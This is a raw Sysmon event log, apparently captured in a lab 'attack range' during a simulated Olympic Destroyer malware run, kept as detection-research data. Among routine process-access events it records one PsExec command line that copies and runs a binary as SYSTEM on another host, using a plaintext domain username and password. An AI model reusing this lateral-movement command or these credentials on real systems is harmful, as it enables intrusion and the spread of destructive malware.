11:04:59.975{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:59.975{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47d70|C:\Windows\System32\SHELL32.dll+6396c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:59.975{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63940|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:59.975{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:59.707{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3A6999618DAB7E2B1CA368E545A95F,SHA256=884459CCC09122B8146934808C79D9284B99A74CD2A39FA64AD29E7034B3D202,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219264Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:59.581{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43E8C35DC3CF85C0E5878460E63D54FC,SHA256=A880A8A190D14855A2996C337CD2A6F620FE9E843A4E7C9773F67B5693CBC297,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295056Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.897{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295055Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.897{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000295054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:05:00.850{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000295053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.782{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FEAB79A1DADB9C8487BD922EF8E2569,SHA256=8CFDC9FC57AFFD0DE4B8FA5E5A6FD12773BA2B4A23ECD8199754B1FA158FCB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.682{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-14DC-6216-AF06-000000003802}4592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.682{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-14DC-6216-AF06-000000003802}4592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000219266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:00.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BA99EFE66456B7B6F1457771C1E48B,SHA256=F4A07B2F21011730740EA2609E7499AD22E8C865B902EE8D8B03E943407586CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:04:58.565{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000295049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.611{C8EA50B7-14DC-6216-AF06-000000003802}45926676C:\Windows\system32\conhost.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.408{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-14DC-6216-AF06-000000003802}4592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.392{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14DC-6216-AF06-000000003802}4592C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.238{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.222{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.222{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.222{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.222{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.207{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.215{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.1 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.207{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-14DC-6216-AE06-000000003802}2460C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.207{C8EA50B7-14C5-6216-AA06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000295037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.022{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.022{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:00.022{C8EA50B7-F2AD-6215-C000-000000003802}4856348C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000219265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:04:57.561{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51508-false10.0.1.12-8000- 23542300x8000000000000000219268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:01.831{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A890A64CBC3BF61CAA71595AFFFDE3BA,SHA256=A1CB4174414180C689E5F9F74E6A716580C38F98B2C2FCF669EFE9C2F8AEDB5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.714{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E356D13BC3BC2B177ACDEA9BACCE7D18,SHA256=6E2F52893437DCC37DFCE36C41F847F52221F76738AEF3337B06ABBE7362A8E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.529{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-14DD-6216-B006-000000003802}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.514{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.514{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-14DD-6216-B006-000000003802}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:01.514{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 